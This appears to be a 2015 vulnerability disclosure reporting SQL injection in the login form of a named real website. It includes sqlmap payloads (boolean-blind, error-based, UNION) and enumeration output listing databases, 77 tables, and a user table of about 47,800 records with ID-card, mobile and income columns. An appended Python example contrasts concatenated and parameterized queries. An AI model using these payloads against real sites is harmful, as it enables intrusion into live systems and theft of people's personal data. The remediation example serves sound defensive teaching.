2015-11-30: Details reported to the vendor; awaiting vendor response
2015-12-05: The vendor chose to ignore the vulnerability; details disclosed to the public
http://erp.csztv.cn/member --forms
Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=EkfU&password=-6480' OR (5389=5389)#&submit=%E7%99%BB%E5%BD%95

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=EkfU&password=' AND (SELECT 8421 FROM(SELECT COUNT(*),CONCAT(0x3a6e766f3a,(SELECT (CASE WHEN (8421=8421) THEN 1 ELSE 0 END)),0x3a6779793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bjHd'='bjHd&submit=%E7%99%BB%E5%BD%95

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: username=EkfU&password=' UNION ALL SELECT CONCAT(0x3a6e766f3a,0x56706b4753516b416c69,0x3a6779793a),NULL,NULL,NULL,NULL#&submit=%E7%99%BB%E5%BD%95
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
available databases [4]:
[*] aitupu
[*] bang
[*] information_schema
[*] vote
Database: bang
[77 tables]
+----------------------------+
| adcenter                   |
| att_daka_detail_his        |
| att_daka_his               |
| att_leave                  |
| att_log_his                |
| att_members                |
| att_task                   |
| att_train                  |
| att_train_user             |
| att_usertask               |
| bang_action_prize          |
| bang_candidate             |
| bang_capta                 |
| bang_changelog             |
| bang_event                 |
| bang_group                 |
| bang_hostip                |
| bang_mob_dinfo             |
| bang_mob_gg                |
| bang_module                |
| bang_news                  |
| bang_node                  |
| bang_option_his            |
| bang_page_option           |
| bang_page_option_bak       |
| bang_page_option_old       |
| bang_page_result           |
| bang_page_title            |
| bang_phone                 |
| bang_phone_tamp            |
| bang_poll                  |
| bang_poll_info             |
| bang_poll_info_temp        |
| bang_poll_infot            |
| bang_poster                |
| bang_rank_news             |
| bang_rank_trade            |
| bang_sessions              |
| bang_sign                  |
| bang_smsinfo               |
| bang_smsinfo_back          |
| bang_survey                |
| bang_tjinfo                |
| bang_tjtype                |
| bang_user                  |
| bang_user_action           |
| bang_user_group            |
| bang_user_group_permission |
| bang_user_permission       |
| class                      |
| contable                   |
| host13_image               |
| host13_news                |
| host_image                 |
| host_news                  |
| intorder                   |
| poll_ads                   |
| poster                     |
| qauserinfo                 |
| range                      |
| test_test                  |
| torder                     |
| trade                      |
| userinfo                   |
| wy_action                  |
| wy_capta                   |
| wy_student                 |
| wy_vote                    |
| yd_daka_detail_his         |
| yd_daka_his                |
| yd_leave                   |
| yd_log_his                 |
| yd_members                 |
| yd_task                    |
| yd_train                   |
| yd_train_user              |
| yd_usertask                |
+----------------------------+

back-end DBMS: MySQL 5.0
Database: bang
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| bang_user | 47828   |
+-----------+---------+

Database: bang
Table: bang_user
[14 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| age       | int(4)       |
| ban       | tinyint(4)   |
| banreason | varchar(200) |
| email     | varchar(50)  |
| id        | int(11)      |
| idcard    | varchar(20)  |
| income    | int(6)       |
| isok      | int(1)       |
| mobile    | bigint(12)   |
| name      | varchar(50)  |
| point     | double       |
| rname     | varchar(20)  |
| sex       | int(4)       |
| uid       | int(11)      |
+-----------+--------------+
Prepared statements + SQL parameterization and filtering
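
The remediation above, as an added example that is not part of the original report: Python code using an in-memory SQLite database in place of the PHP/MySQL stack, contrasting a string-built login query with the parameterized form. The members table, its columns and the sample account are constructed for illustration.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the login table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    # Plaintext column only to keep the focus on query construction;
    # a real table would hold a salted password hash.
    db.execute("CREATE TABLE members (username TEXT, password TEXT)")
    db.execute("INSERT INTO members VALUES ('alice', 's3cret-A')")
    db.commit()
    return db

def login_concat(db, username, password):
    """Vulnerable pattern: request values are spliced into the SQL text."""
    sql = ("SELECT username FROM members WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_param(db, username, password):
    """Hardened pattern: the SQL text is fixed, values are bound parameters."""
    sql = "SELECT username FROM members WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# Same shape as the boolean-based input shown in the report, with SQLite's
# "--" comment in place of MySQL's "#".
TAUTOLOGY = "-6480' OR (5389=5389) --"

def demo():
    """Run both login functions on a valid login and on the tautology input."""
    db = make_db()
    return {
        "concat_legit": login_concat(db, "alice", "s3cret-A"),
        "concat_tautology": login_concat(db, "EkfU", TAUTOLOGY),
        "param_legit": login_param(db, "alice", "s3cret-A"),
        "param_tautology": login_param(db, "EkfU", TAUTOLOGY),
    }

if __name__ == "__main__":
    for case, user in demo().items():
        print(f"{case}: {user}")
```

With bound parameters the quote character stays data, so the tautology is compared literally against the stored password and matches no row.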
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-05 09:38
Vulnerability Rank: 4 (WooYun rating)
None yet